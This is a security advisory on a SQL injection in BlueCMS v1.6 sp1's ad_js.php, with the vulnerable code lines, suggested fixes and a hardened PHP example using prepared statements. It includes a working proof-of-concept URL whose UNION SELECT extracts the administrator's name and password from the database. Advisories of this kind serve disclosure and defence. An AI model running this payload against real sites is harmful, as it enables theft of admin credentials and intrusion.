BlueCMS v1.6 sp1 ad_js.php SQL injection vulnerability

2010-09-14T00:00:00
ID MYHACK58:62201027862
Type myhack58
Reporter Anonymous
Modified 2010-09-14T00:00:00

Description

Affected version:

BlueCMS v1.6 sp1

Vulnerability description:

Vulnerable file: ad_js.php

Cause of the vulnerability:

Line 12: $ad_id = !empty($_GET['ad_id']) ? trim($_GET['ad_id']) : ''; // The other files in the root directory filter their input well, and numeric variables are almost always restricted with intval(), but this file was missed: it only uses trim() to strip leading and trailing whitespace.

Line 19: $ad = $db->getone("SELECT * FROM ".table('ad')." WHERE ad_id =".$ad_id); // the value is concatenated directly into the query

<*reference

http://www.wooyun.org/bug.php?action=view&id=141

*>

Test method:

[www.sebug.net] The programs (methods) provided on this site may be offensive in nature and are intended for security research and teaching purposes only; use at your own risk!

http://localhost/cms/ad_js.php?ad_id=1%20and%201=2%20union%20select%201,2,3,4,5,concat(admin_name,0x7C0D0A,pwd),concat(admin_name,0x7C0D0A,pwd)%20from%20blue_admin%20where%20admin_id=1

Right-click the page and choose View Source to see the returned data.

SEBUG security recommendations:

SEBUG temporary solution: $ad_id = !empty($_GET['ad_id']) ? intval($_GET['ad_id']) : '';
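
A stricter variant of the temporary fix above, as an added example that is not BlueCMS or SEBUG code: the value is validated as a positive integer and rejected otherwise, and the lookup uses a bound parameter instead of concatenation. The helper names parse_ad_id and fetch_ad, the demo_ad table and the in-memory SQLite database are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Hypothetical helper: strictly parse an ad_id request value. Returns a
// positive int, or null when the value is missing, an array (ad_id[]=1) or
// not a plain decimal integer. intval() would instead silently turn
// "1 and 1=2" into 1; here such input is rejected so it can be logged.
function parse_ad_id($raw): ?int
{
    if (!is_string($raw)) {
        return null;
    }
    $id = filter_var(trim($raw), FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Hypothetical helper: look up one ad with a bound integer parameter, so the
// request value never becomes part of the SQL text.
function fetch_ad(PDO $pdo, int $adId): ?array
{
    $stmt = $pdo->prepare('SELECT * FROM demo_ad WHERE ad_id = :ad_id');
    $stmt->bindValue(':ad_id', $adId, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed demo data in an in-memory SQLite database (requires pdo_sqlite).
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE demo_ad (ad_id INTEGER PRIMARY KEY, content TEXT)');
$pdo->exec("INSERT INTO demo_ad VALUES (1, 'banner one')");

// Constructed inputs: valid id, padded id, non-numeric tails, array, missing.
$samples = ['1', ' 1 ', '1 and 1=2', '1abc', ['1'], null];
foreach ($samples as $raw) {
    $label = json_encode($raw);
    $id = parse_ad_id($raw);
    if ($id === null) {
        echo "$label => rejected\n";
        continue;
    }
    $ad = fetch_ad($pdo, $id);
    echo "$label => ad_id=$id, " . ($ad === null ? 'no such ad' : $ad['content']) . "\n";
}
```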

Vendor patch:

The vendor has not yet provided a patch or upgrade; users of this software are advised to watch the vendor's home page for the latest version: